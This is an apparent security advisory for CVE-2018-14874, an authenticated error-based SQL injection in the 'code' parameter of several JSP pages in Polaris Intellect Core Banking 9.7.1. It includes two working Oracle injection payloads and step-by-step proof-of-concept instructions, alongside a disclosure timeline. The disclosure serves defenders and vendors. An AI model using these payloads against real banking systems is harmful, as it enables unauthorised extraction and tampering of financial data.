Error Based SQL Injection Vulnerability in Polaris’ Intellect Core Banking Software Version 9.7.1 [CVE-2018-14874]


[+] Credits: Neeraj Kumar, Hai Dang Long
[+] Email: neeraj.iiita2009@gmail.com

Vendor:
====================

Product:
===================
Polaris’ Intellect Core Banking, Armor Module

Version:
===================
Affected Version: 9.7.1

Vulnerability Type:
==========================
Error Based SQL Injection vulnerability

CVE Reference:
==============
 CVE-2018-14874

Vulnerability Details:
======================
SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data. The Intellect Core is and Core Banking software used for manage the core banking functions. In Armor Module of the Intellect Core, input passed through the parameter 'code' in three pages as 'collaterals/colexe3t.jsp' and '/references/refsuppu.jsp' and '/references/refbranu.jsp' is not properly sanitising the input before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, destroy the data or make it otherwise unavailable and escalate his privileges to become administrator of the database server.
Note: This is vulnerable only with authenticated session.

SQL Exploit Code(s):
====================
Payload:
1) ' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
2) '%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--


Affected Component:
====================
Parameter Name: code

Proof-of-Concept:
====================
1. Login into the Application.
2. Access /refsuppu.jsp or /refbranu.jsp page.
3. Put below payloads in code parameter-
Payload-1:' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
Payload-2:'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--
4.It will give database name in error response.

Payload:
' or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)—
Figure (a): With Payload-1

'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--
Figure (b): With Payload-2

Disclosure Timeline:
=====================
Vendor Notofication:17 June 2018
Mitre Notification: 3 August 2018
Public Disclosure: 31 March 2019

Attack Type:
=======================
Remote

Impact Code execution:
=======================
True

Impact Information Disclosure:
=======================
True

Description:
=====================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Intellect Core Banking Software (Polaris), Armor Module Version: 9.7.1
Vulnerable Parameter(s): [+] code

References:
=====================================================

[+] Disclaimer:
=====================================================
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).

Comments

Popular posts from this blog

Cross-Site Request Forgery- Smartvista SVFE-2 Module [CVE-2018-15206]

Stored XSS Vulnerability in Hot Scripts Clone:Script Classified Version 3.1-[CVE-2018-7650]

Session Fixation- Smart Vista SVFE-2 Module [CVE-2018-15208]